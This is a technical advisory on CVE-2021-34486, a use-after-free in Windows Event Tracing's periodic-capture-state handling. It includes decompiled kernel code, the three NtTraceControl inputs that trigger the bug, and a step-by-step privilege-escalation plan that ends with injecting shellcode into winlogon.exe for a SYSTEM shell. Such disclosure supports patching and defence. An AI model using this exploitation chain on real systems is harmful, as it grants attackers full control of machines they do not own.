CVE-2021-34486: Event Tracing for Windows (ETW) TimerCallbackContext Object Use-After-Free Vulnerability



Overview

The Event Tracing for Windows (ETW) mechanism allows the logging of kernel or application-defined events for debugging purposes. Developers are able to start and stop event tracing sessions, instrument an application to provide trace events, and consume trace events by calling the ETW set of user-mode Windows APIs. Eventually these will lead to corresponding syscall requests to the kernel (ntoskrnl.exe) to perform the functionalities.

In the ETW request to update periodic capture state, under specific conditions, there exist an use-after-free vulnerability whereby an atacker is able to controllably allocate a 0x30-bytes buffer, free it and reuse this buffer subsequently to execute arbitrary code.



Affected Versions

The POC is tested on

  • Windows 10 (x64) 21H1 (OS Build 19043.1083) with KB5004945 Cumulative Updates (07 Jul 2021) installed
  • Windows 10 (x64) 21H1 (OS Build 19043.1052) with KB5003637 Cumulative Updates (Jun 2021) installed
  • Windows 10 (x64) 21H1 (OS Build 19043.1023) with KB5003214 Cumulative Updates (May 2021) installed
  • Windows 10 (x64) 21H1 (OS Build 19043.985) with KB5003173 Cumulative Updates (May 2021) installed

The following analysis is done on ntoskrnl.exe 10.0.19041.867 (ie: Windows 10 20H2 with Mar 2021 updates).



Technical Details

The request to update periodic capture state is sent with the NtTraceControl() function, with function code 0x25 and following input buffer format.


    typedef struct _ETW_UPDATE_PERIODIC_CAPTURE_STATE
    {
        ULONG 	LoggerId;
        ULONG 	DueTime;	//system time units (100-nanosecond intervals)
        ULONG 	NumOfGuids;
        GUID 	Guids[ANYSIZE_ARRAY];
    } ETW_UPDATE_PERIODIC_CAPTURE_STATE, * PETW_UPDATE_PERIODIC_CAPTURE_STATE;
                                

A total of 3 requests to update periodic capture states is required to trigger the use-after-free vulnerability.

In the first request:


    ETW_UPDATE_PERIODIC_CAPTURE_STATE InBuff1 = {
        2,
        0,
        1,
        {GUID({ 0xF526AD2F, 0x57F9, 0x5336, {0x96, 0x37, 0x5C, 0x2E, 0x54, 0xF8, 0x7E, 0x9C} })} };
                                

The ntoskrnl first retrieves the PVOID LoggerContext corresponding to LoggerId 2. Then it ensures that all Guids[] have notification access in this LoggerContext. Next it allocates a timer object for the PeriodicCaptureStateTimerCallback() timer callback routine and its callback context parameter, the 0x30 bytes CONTEXTINFO TimerContextInfo object with the EtwU pool tag, saves a reference and activates it.


    typedef struct _CONTEXTINFO
    {
        WORK_QUEUE_ITEM	 WorkItem;
        ULONG64			Unknown;
        USHORT			LoggerId;
        UCHAR			Padding[6];
    } CONTEXTINFO, *PCONTEXTINFO;

                                

    __int64 __fastcall EtwpUpdatePeriodicCaptureState(unsigned int LoggerId, unsigned int DueTime, unsigned __int16 NumOfGuids, GUID *Guids)
    {
        ...
        //if there is no saved timer object reference, then allocate a new instance...
        if ( !LoggerContext_->ExTimerObject )
        {
        TimerContextInfo = (CONTEXTINFO *)ExAllocatePoolWithTag(NonPagedPoolNx, 0x30ui64, 'UwtE');//allocate CONTEXTINFO object
        TimerContextInfo_ = TimerContextInfo;
        if ( !TimerContextInfo )
            goto RETURN_ERROR_C0000017;
        TimerContextInfo->LoggerId = LoggerId;//InBuff1.LoggerId
        TimerContextInfo->Unknown = v22;
        TimerContextInfo->WorkItem.WorkerRoutine = SendCaptureStateNotificationsWorker;//pointer of worker function
        TimerContextInfo->WorkItem.Parameter = TimerContextInfo;//input parameter for worker function
        TimerContextInfo->WorkItem.List.Flink = 0i64;
        LoggerContext_->ExTimerObject = ExAllocateTimer((PEXT_CALLBACK)PeriodicCaptureStateTimerCallback, TimerContextInfo, 8u);//save timer ref
        }
        ExTimerObject = (PEX_TIMER)LoggerContext_->ExTimerObject;
        LoggerContext_->DueTime = 0xFFFFFFFFFF676980ui64 * DueTime;
        ExSetTimer((ULONG_PTR)ExTimerObject);//DueTime = InBuff1.DueTime * FFFFFFFFFF676980h
        LODWORD(LoggerContext_->ExTimerState) = 1;
        goto RETURN_1;
        ...
    RETURN_1:
        if ( (_InterlockedExchangeAdd64(pLock, 0xFFFFFFFFFFFFFFFFui64) & 6) == 2 )
            ExfTryToWakePushLock(pLock);
        KeAbPostRelease((ULONG_PTR)pLock);
    RETURN_2:
        EtwpReleaseLoggerContext(LoggerContext_, 0i64);
        return (unsigned int)res_EtwpCheckNotificationAccess;
    }
                                

The PeriodicCaptureStateTimerCallback() routine simply enqueues SendCaptureStateNotificationsWorker(PCONTEXTINFO TimerContentInfo) callback routine as a work item for the system work queue. Finally, the SendCaptureStateNotificationsWorker() routine would build and send the notification data packet to all Guids[].

In the second request:


    ETW_UPDATE_PERIODIC_CAPTURE_STATE InBuff2 = {
        2,
        0,
        1,
        {GUID({ 0x60D201F4, 0x741E, 0x4792, {0xB5, 0xB3, 0x67, 0x3F, 0xC6, 0xC2, 0x5B, 0x3B} })} };
                                

However, this time, if any one of these Guids[] do not have notification access in the retrieved LoggerContext, and therefore proceed to reset LoggerContext->NumOfGuids to 0.


    __int64 __fastcall EtwpUpdatePeriodicCaptureState(unsigned int LoggerId, unsigned int DueTime, unsigned __int16 NumOfGuids, GUID *Guids)
    {
        ...
        {
        ...
    FREE_POOLS_AND_RESET:
        GuidsPool = (void *)LoggerContext_->GuidsPool;
        if ( GuidsPool )
        {
            ExFreePoolWithTag(GuidsPool, 0);
            LoggerContext->GuidsPool = 0i64;
            LOWORD(LoggerContext->NumOfGuids) = 0;
        }
        ...
        }
        if ( (_DWORD)NumOfGuids_ )
        {
        while ( 1 )//loop to ensure all Guids[] have notification-access rights
        {
            res_EtwpCheckNotificationAccess = EtwpCheckNotificationAccess(
                                                &Guids[v4].Data1,
                                                (__int64)&LoggerContext_->field_0[0x124]);
            if ( res_EtwpCheckNotificationAccess < 0 )
            break;
            if ( ++v4 >= (int)NumOfGuids_ )
            goto ALL_GUIDS_HAVE_NOTIFICATION_ACCESS_OK;
        }
        res_EtwpCheckNotificationAccess = 0xC0000022;
        v8 = 0;
        goto FREE_POOLS_AND_RESET;
        }
    ALL_GUIDS_HAVE_NOTIFICATION_ACCESS_OK:
        ...
    }
                                

By this time, the DueTime would have expired and the SendCaptureStateNotificationsWorker() worker routine called into. This routine similarly first retrieves the corresponding LoggerContext. And since LoggerContext->NumOfGuids has been reset by the second request, the routine would not perform any of its intended tasks. Instead it would immediately free its input parameter; the PCONTEXTINFO TimerContextInfo pool.


    void __fastcall SendCaptureStateNotificationsWorker(CONTEXTINFO *TimerContextInfo)
    {
    ...
    if ( TimerContextInfo )
    {
        LoggerContext = (LOGGERCONTEXT *)EtwpAcquireLoggerContextByLoggerId(
                                        TimerContextInfo->Unknown,
                                        LOWORD(TimerContextInfo->LoggerId),
                                        0);
        if ( LoggerContext )
        {
        pLock = &LoggerContext->Lock;
        ExAcquirePushLockExclusiveEx((ULONG_PTR)&LoggerContext->Lock, 0i64);
        LODWORD(LoggerContext__->ExTimerState) = 0;
        if ( *(_DWORD *)&LoggerContext__->field_0[336] )
        {
            //this branch is the main functionality of SendCaptureStateNotificationsWorker() worker routine...
            NumOfGuids = LOWORD(LoggerContext__->NumOfGuids);
            if ( (_WORD)NumOfGuids )//...which will be executed when LoggerContext->NumOfGuids > 0
            {
            ...
                                if ( (int)EtwpBuildNotificationPacket(v10, v23, v15, &v19) >= 0 )
                                {
                                    EtwpSendDataBlock(v12, v19);
                                    EtwpUnreferenceDataBlock(v19);
                                }
                ...
                if ( LOWORD(LoggerContext__->NumOfGuids) && !LODWORD(LoggerContext__->ExTimerState) )
                {
                ExSetTimer(LoggerContext__->ExTimer);
                LODWORD(LoggerContext__->ExTimerState) = 1;
                v2 = 1;
                }
                ...
            ...
            }		// end of "NumOfGuids" condition
        }		// end of "LoggerContext__->field_0[336]" condition
        if ( (_InterlockedExchangeAdd64(pLock, 0xFFFFFFFFFFFFFFFFui64) & 6) == 2 )
            ExfTryToWakePushLock(pLock);
        KeAbPostRelease((ULONG_PTR)pLock);
        EtwpReleaseLoggerContext(LoggerContext__, 0i64);
        if ( v2 )//v2 is set when main functionality is executed, and hence TimerContextInfo pool is still in-used...
            return;
        goto LABEL_31;//...otherwise, TimerContextInfo pool is freed
        }
    }
    LABEL_31:
    ExFreePoolWithTag(TimerContextInfo, 0);
    }
                                

In the third and last request:


    ETW_UPDATE_PERIODIC_CAPTURE_STATE InBuff3 = {
    2,
    0,
    1,
    {GUID({ 0xF526AD2F, 0x57F9, 0x5336, {0x96, 0x37, 0x5C, 0x2E, 0x54, 0xF8, 0x7E, 0x9C} })} };
                                

The ntoskrnl executes similarly as the first packet. Except that this time, because there is a saved reference of the timer object in LoggerContext_->ExTimer, the previously freed CONTEXTINFO TimerContextInfo pool would be reused instead to start a new timer operation ExSetTimer(). Subsequently, the freed pool is referenced, resulting in the BSOD. There are three common scenarios which the freed pool is referenced again:

  1. During validation of work item in ExQueueWorkItem(), leading to a BSOD Bugcheck Code E4 (WORKER_INVALID)
  2. Freed again in SendCaptureStateNotificationsWorker() worker routine, leading to a BSOD Bugcheck Code 13A (KERNEL_MODE_HEAP_CORRUPTION)
  3. Other unrelated code which has re-allocated for the freed pool, leading to BSOD Bugcheck Code 50 (PAGE_FAULT_IN_NONPAGED_AREA)

It is worthwhile to note that sometimes, the LoggerId value have to be 3 instead of 2 to trigger the vulnerability.



Exploitation Strategy

The main exploitation plan is to reclaim the freed 0x30 bytes pool and overwrite it with controlled bytes. This would allow us to control the callback function pointer and its corresponding parameter pointer. Although most heap-spray techniques allocate for pool sizes larger than 0x30 bytes, it is not necessary to keep the pool allocated as these techniques do. In other words, it would suffice if one could allocate for a 0x30 bytes pool, write its content, and it does not matter if the buffer is subsequently freed as long as it is not reallocated by other modules. Fortunately there exist some Nt functions that allow us to do this.

Next, we have to find a gadget function that set the SE_DEBUG_PRIVILEGE token bit, with the condition that it accepts only 1 pointer parameter. Fortunately, after some reverse-engineering, it was discovered (hat-tip to Wei Lei) that the RtlSetAllBits() to function is the perfect candidate; it takes a RTL_BITMAP BitMapHeader structure pointer and sets the bits accordingly. However, as the system thread is executing the callback function, the RTL_BITMAP BitMapHeader structure has to be allocated in the kernel. Otherwise the Supervisor Mode Access Prevention (SMAP) would bugcheck. To work around this, the structure (plus padding) could be set as a thread name and its pool address could be leaked with NtQuerySystemInformation(SystemBigPoolInformation)[1].

Finally the gadget function and process token pointers could be leaked with the widely-used NtQuerySystemInformation(SystemModuleInformation) and NtQuerySystemInformation(SystemHandleInformation) techniques.

To summarize, the exploitation steps are:

  1. Leak kernel base address of ntoskrnl.exe with NtQuerySystemInformation(SystemModuleInformation)
  2. Get function offset of RtlSetAllbits() in ntoskrnl.exe
  3. Leak current process token address with NtQuerySystemInformation(SystemHandleInformation)
  4. Set a fake RTL_BITMAP FakeBitMapHeader as thread name and leak its kernel pool address with NtQuerySystemInformation(SystemBigPoolInformation)
  5. Allocate for a fake CONTEXTINFO FakeContextInfo structure with the following conditions:
    • FakeContextInfo->WorkItem.List.Flink = 0 (so that current WorkItem will be validated and enqueued)
    • FakeContextInfo->WorkItem.WorkerRoutine = ntoskrnl base address + RtlSetAllBits() offset
    • FakeContextInfo->WorkItem.Parameter = RTL_BITMAP FakeBitMapHeader
  6. Send first NtTraceControl(0x25) request to trigger allocation of real CONTEXTINFO ContextInfo pool
  7. Send second NtTraceControl(0x25) request to trigger free of real CONTEXTINFO ContextInfo pool
  8. Reclaim and overwrite the freed pool with FakeContextInfo
  9. Send third NtTraceControl(0x25) request to trigger (re)use of FakeContextInfo, to enable SE_DEBUG_PRIVILEGE of current process token
  10. Inject shellcode into winlogon.exe to create a SYSTEM cmd.exe
cve-2021-34486.JPG

References

  1. crazy rabbidz (@_hugsy_), SetThreadDescription() as a way to allocate controlled kernel pools